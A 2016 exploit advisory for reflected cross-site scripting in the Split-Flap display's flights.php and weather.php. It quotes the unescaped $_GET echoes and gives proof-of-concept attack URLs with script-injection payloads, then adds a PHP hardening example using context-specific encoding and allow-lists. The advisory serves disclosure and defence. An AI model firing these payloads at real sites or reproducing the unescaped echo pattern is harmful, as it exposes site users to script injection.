Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php)

# Exploit Title: Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php)
# Date: 2016-06-10
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/baspete/Split-Flap , http://pete.basdesign.com/
# Software Link: https://github.com/baspete/Split-Flap/archive/master.zip
# Version: none(releases)
# Tested on: Debian [wheezy]
# CVE : none

### Vulnerability Details #####################################################
# Both scripts echo $_GET parameters straight into the page without any
# encoding, so the reflected values are vulnerable. The hidden inputs below
# are the affected output:
#
#  <!-- parameters -->
#      <input type="hidden" name="data" value="<?php echo $_GET["data"] ?>" />
#      <input type="hidden" name="sort" value="<?php echo $_GET["sort"] ?>" />
#      <input type="hidden" name="order" value="<?php echo $_GET["order"] ?>" />
###############################################################################

### XSS1 - flights.php
Attack Code
http://127.0.0.1/vul_test/Split-Flap/flights.php?data=departures&sort=scheduled"><script>alert(45)</script>&order=as

Vulnerable parameters
 - order
 - sort
 - data

### XSS2 - weather.php
Attack Code
http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey="%2Balert(45)%2B"a
http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey=</script><script>alert(45)</script>

Vulnerable parameters
 - apiKey
 - data
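The following is an added hardening example for both findings above; it is not code from Split-Flap or from the advisory author. It covers the two output contexts the PoC URLs exercise: an HTML attribute value (the flights.php hidden inputs, whose code the advisory quotes) and a JavaScript string literal for apiKey in weather.php (that context is an assumption inferred from the `"+alert(45)+"` payload shape, since the advisory does not quote weather.php's code). The helper names attr(), jsString() and pick(), and the allow-lists for data/sort/order, are my own choices, not the project's.

```php
<?php
// Added hardening example (not Split-Flap's own code). Each reflected value
// is encoded for the exact context it lands in, and parameters with a small
// set of legal values are validated against an allow-list first.

declare(strict_types=1);

// Encode a value for use inside a quoted HTML attribute. ENT_QUOTES escapes
// both " and ', so a payload such as  scheduled"><script>  is rendered as
// scheduled&quot;&gt;&lt;script&gt; and can no longer close the attribute.
function attr(?string $value): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode a value as a JavaScript string literal for use inside <script>.
// json_encode emits the surrounding quotes and escapes the content; the
// JSON_HEX_* flags additionally hex-encode < > & ' " so that neither
// "</script>" can terminate the block nor "+alert(..)+" can leave the string.
function jsString(?string $value): string
{
    return json_encode(
        $value ?? '',
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
        | JSON_UNESCAPED_UNICODE | JSON_INVALID_UTF8_SUBSTITUTE
    );
}

// Reject anything outside a known set of values and fall back to a default.
// (The allowed lists below are assumptions for this example, not the
// project's real option set; "departures" and "scheduled" come from the PoC.)
function pick(?string $value, array $allowed, string $default): string
{
    return in_array($value, $allowed, true) ? $value : $default;
}

$data   = pick($_GET['data']  ?? null, ['departures', 'arrivals'], 'departures');
$sort   = pick($_GET['sort']  ?? null, ['scheduled', 'actual'],    'scheduled');
$order  = pick($_GET['order'] ?? null, ['asc', 'desc'],            'asc');
$apiKey = $_GET['apiKey'] ?? '';   // free-form, so it relies on encoding alone
?>
<!-- parameters: every reflected value passes through attr() -->
<input type="hidden" name="data"  value="<?= attr($data) ?>" />
<input type="hidden" name="sort"  value="<?= attr($sort) ?>" />
<input type="hidden" name="order" value="<?= attr($order) ?>" />

<script>
  // jsString() supplies the quotes; do not add your own around it.
  var apiKey = <?= jsString($apiKey) ?>;
</script>
```

The point of keeping two separate encoders is that HTML-attribute escaping is not sufficient inside a `<script>` block (and vice versa): `htmlspecialchars` would leave `"+alert(45)+"` able to break a JavaScript string, while `json_encode` alone without the `JSON_HEX_TAG` flag would still let `</script>` end the block. Where a parameter only ever takes a few fixed values, as `sort` and `order` appear to, validating against an allow-list removes the reflected-input problem entirely rather than merely neutralising it.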